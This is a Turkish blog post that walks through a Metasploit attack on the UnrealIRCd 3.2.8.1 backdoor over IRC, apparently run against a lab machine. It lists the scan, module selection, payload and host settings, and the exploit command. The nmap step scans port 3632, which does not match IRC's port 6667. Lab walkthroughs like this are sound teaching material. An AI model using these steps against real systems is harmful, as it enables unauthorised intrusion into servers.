IRC Nedir? Internet Relay Chat veya IRC, İnternette en çok kullanılan protokollerden bir tanesidir. 1988 yılında Finlandiya’da Oulu...

Internet Relay Chat (IRC) | 6667/tcp | Pentesting

9/30/2017 0 Yorumlar




IRC Nedir?

Internet Relay Chat veya IRC, İnternette en çok kullanılan protokollerden bir tanesidir. 1988 yılında Finlandiya’da Oulu Üniversitesi öğrencisi olan Jarkko Oikarinen tarafından yazılmıştır. kaynak:wikipedia

############################################################################################

"nmap -sV -p 3632 192.168.198.129" -> nmap -sS -p <taranacak_port> <hedef_ip> şeklinde yazdık.



############################################################################################

"search irc" -> IRC servisine yönelik hangi exploit’lerin kullanılabileceğini gormek için adının geçtiği exploitleri listeliyoruz.



İşimize yarayacak exploit burda, zaten sağda rank kısmında exellent yazan exploit de bu, şansımız yüksek devam ..



############################################################################################

"use exp_name" -> use komutuyla exploit’i kullanacağız

exploit(unreal_ircd_3281_backdoor)"show options" -> Exploit’in sisteme erişmesi için gerekli ayarlamaların neler olduğunu öğrenmek için bu komutu kullandık.



############################################################################################

exploit(unreal_ircd_3281_backdoor)" show payloads " diyip , payloadları listeliyoruz.
exploit(unreal_ircd_3281_backdoor)" set payload <secilen_payload >" diyip , payloadı belirtiyoruz.



############################################################################################

show options dedik , değer atanması gereken ayarlar require = yes olanlardır.

exploit(unreal_ircd_3281_backdoor)" set rhost " diyip , hedef ip giriyoruz.



############################################################################################

exploit(unreal_ircd_3281_backdoor)"set LHOST" -> Local ip adresimizi yazıyoruz. Komut çalıştırabileceğiniz cmd prompt’una win: ipconfig / linux: ifconfig yazıp öğrenebilirsiniz.
exploit(unreal_ircd_3281_backdoor)"exploit" -> Sızma işlemini başlatıyoruz.

İşlem başlatıldı fakat, sızma girişimi başarısız, son olarak ayarlamalara bnakıyoruz bir umut ne eksik ne fazla neyi değişeyim neyi arttırayım derken , lport’un default olarak 4444 olduğunu ve benim porumun açık olmadığını sızma işlemini gerçekleştirmek isterken bu portu kullanmak isteyip, iletişim sağlayamayıp başarısız sonuçlandığını düşündüm, zaten hedef ile saldırı işlemini yaptığım makina ip’leri aynı host üzerinde farkettiyseniz, port açmaya no require :=)

exploit(unreal_ircd_3281_backdoor)"unset lport" -> Lport değerini default değerden arındırıp null yapıyoruz.
exploit(unreal_ircd_3281_backdoor)"exploit" -> Sızma işlemini başlatıyoruz.



###############################################################

vee Bingoo :)

0 yorum: